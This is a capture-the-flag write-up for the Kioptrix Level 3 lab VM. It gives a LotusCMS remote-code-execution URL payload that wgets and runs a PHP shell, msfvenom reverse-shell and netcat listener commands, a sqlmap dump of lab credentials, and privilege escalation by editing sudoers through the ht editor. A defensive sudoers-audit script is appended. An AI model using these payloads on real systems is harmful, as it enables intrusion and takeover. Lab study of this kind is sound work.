Kioptrix: Level 3

This is my writeup for the Kioptrix Level 3 VM from vulnhub.com. It's considered easy. The object of the game is to acquire root access via any means possible. There are more ways than one to successfully complete the challenges.

Intelligence Gathering

When scanning the host with nmap we find two open ports:

  • 22: OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
  • 80: Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)

Starting Nmap 7.60 ( https://nmap.org ) at 2017-10-15 12:06 EDT
Nmap scan report for 192.168.254.168
Host is up (0.0012s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
80/tcp open  http    Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
MAC Address: 00:0C:29:F1:E7:C5 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.03 seconds

Accessing the host at port 80 we get a web app:

[screenshot: web_app]

LotusCMS

When inspecting the source code, we can find LotusCMS in the meta-tag keywords.

[screenshot: searchsploit_lotuscms]

There seems to be a Remote Command Execution vulnerability in this CMS.

http://__IP__/index.php?page=index');phpinfo();//

[screenshot: LotusCMS_rce-1]

Gallarific

If we try to access the gallery link, the page is not rendered correctly. This is because the assets can't be loaded due to the fixed base href. If one reads the description, there is a hint:

Important thing with this challenge. Once you find the IP (DHCP Client) edit your hosts file and point it to kioptrix3.com

[screenshot: source_code_base]

So let's create a hosts-entry:

$ echo "__IP__ kioptrix3.com" >> /etc/hosts

When looking at the meta-tag generator we can see Gallarific, which seems to be a gallery web app.

Let's check searchsploit to see whether there are any known vulnerabilities.

[screenshot: searchsploit]

Exploitation

LotusCMS

We try to get a shell using the Remote Command Execution:

Create a shell:
$ msfvenom -p php/meterpreter_reverse_tcp LHOST=__IP__ LPORT=__PORT__ -f raw > shell.php

Upload the shell:
kioptrix3.com/index.php?page=index');shell_exec('wget http://__IP__/php_shell.txt -O /tmp/shell.php;php -f /tmp/shell.php');//

Start listener:
$ nc -nvlp 42

Kick the shell:
http://kioptrix3.com/index.php?page=index%27);include("/tmp/shell.php");//

[screenshot: php_rev_shell2]

Gallarific

Let's try the SQL injection from the searchsploit list.
To exploit an SQL injection, we use sqlmap:
TODO: It came to my attention that sqlmap is forbidden as well. Do this manually.

$ sqlmap -u "http://kioptrix3.com/gallery/gallery.php?id=1" --random-agent --level 5 --risk 3 -D gallery --dump

Table: gallarific_users

  username    password
  admin       n0t7t1k4

Table: dev_accounts

  username    hash                              password
  dreg        0d3eccfb887aabd50f243b3f155c0f85  Mast3r
  loneferret  5badcaf789d3d1d09794d8f021f40f0e  starwars

SSH

A common mistake people make is reusing passwords. In this case loneferret uses the same password for Gallarific and SSH. This allows us to log in to the box:

$ ssh loneferret@__IP__

Privilege escalation

We're on the box, but with limited access. The next step is to escalate our privileges.
CompanyPolicy.README, which is located in loneferret's home directory, looks interesting.

[screenshot: policy]

The CEO orders users to use sudo ht to view, edit or create files.
What is HT Editor?

This program is a file viewer, editor and analyzer for text, binary, and (especially) executable files.

Setuid

setuid and setgid (short for "set user ID upon execution" and "set group ID upon execution", respectively) are Unix access rights flags that allow users to run an executable with the permissions of the executable's owner or group respectively and to change behaviour in directories. They are often used to allow users on a computer system to run programs with temporarily elevated privileges in order to perform a specific task. While the assumed user id or group id privileges provided are not always elevated, at a minimum they are specific.

setuid and setgid are needed for tasks that require higher privileges than those which common users have, such as changing their login password.
https://en.wikipedia.org/wiki/Setuid

[screenshot: ht-2]
In this case that means we can view, edit or create any file as root.

Let's try to edit /etc/sudoers:

$ sudo ht -t /etc/sudoers

(-t opens the file in text editor mode.) If we can remove the exclamation mark and change the path to /bin/su, we would be able to run /bin/su, which would make us root.
Edit the file and press ctrl+w.

[screenshot: sudoers]
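As an added defender-side example, not part of the original writeup: a small Python auditor that parses a sudoers file and flags any rule letting a user run a file editor as root, because such a rule is equivalent to unrestricted root (the editor can rewrite /etc/sudoers itself). The sudoers fragment and the FILE_EDITORS list are constructed assumptions for this example, not the VM's real configuration.

```python
import re

# Constructed sudoers fragment modelled on this writeup's hint; not the VM's real file.
SAMPLE_SUDOERS = """\
# /etc/sudoers (constructed sample)
Defaults    env_reset
root        ALL=(ALL) ALL
loneferret  ALL=NOPASSWD: !/usr/bin/su, /usr/local/bin/ht
backup      ALL=(root) /usr/bin/rsync
"""

# Assumed list of commands that read or write arbitrary files when run as root.
FILE_EDITORS = {"ht", "vi", "vim", "nano", "emacs", "less", "more", "tee", "cp"}

# Simplified user spec:  user  host=(runas) [TAG:] cmd, cmd ...
RULE_RE = re.compile(r"^(\S+)\s+(\S+)\s*=\s*(?:\(([^)]*)\)\s*)?(.*)$")

def parse_rule(line):
    """Return (user, host, runas, [commands]) for a user-spec line, else None."""
    line = line.split("#", 1)[0].strip()
    if not line or line.startswith("Defaults"):
        return None
    m = RULE_RE.match(line)
    if not m:
        return None
    user, host, runas, cmds = m.groups()
    commands = []
    for part in cmds.split(","):
        # drop tag prefixes such as NOPASSWD: or SETENV:
        part = re.sub(r"^(?:[A-Z]+:\s*)+", "", part.strip())
        if part:
            commands.append(part)
    return user, host, runas or "root", commands

def audit_sudoers(text):
    """Flag rules granting a file editor as root: each is effectively ALL,
    and a "!" exclusion on other commands in the same rule does not limit it."""
    findings = []
    for line in text.splitlines():
        rule = parse_rule(line)
        if rule is None:
            continue
        user, _host, runas, commands = rule
        for cmd in commands:
            if cmd.startswith("!") or runas not in ("root", "ALL"):
                continue
            name = cmd.split()[0].rsplit("/", 1)[-1]
            if name in FILE_EDITORS:
                findings.append((user, cmd, "editor runs as root: can rewrite /etc/sudoers"))
    return findings
```

Run it against the real /etc/sudoers (and /etc/sudoers.d/*) on hosts you administer; a clean result means no rule hands out an editor as root.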

Let's try to run su:

[screenshot: root]

And finally read the flag:

[screenshot: congrats]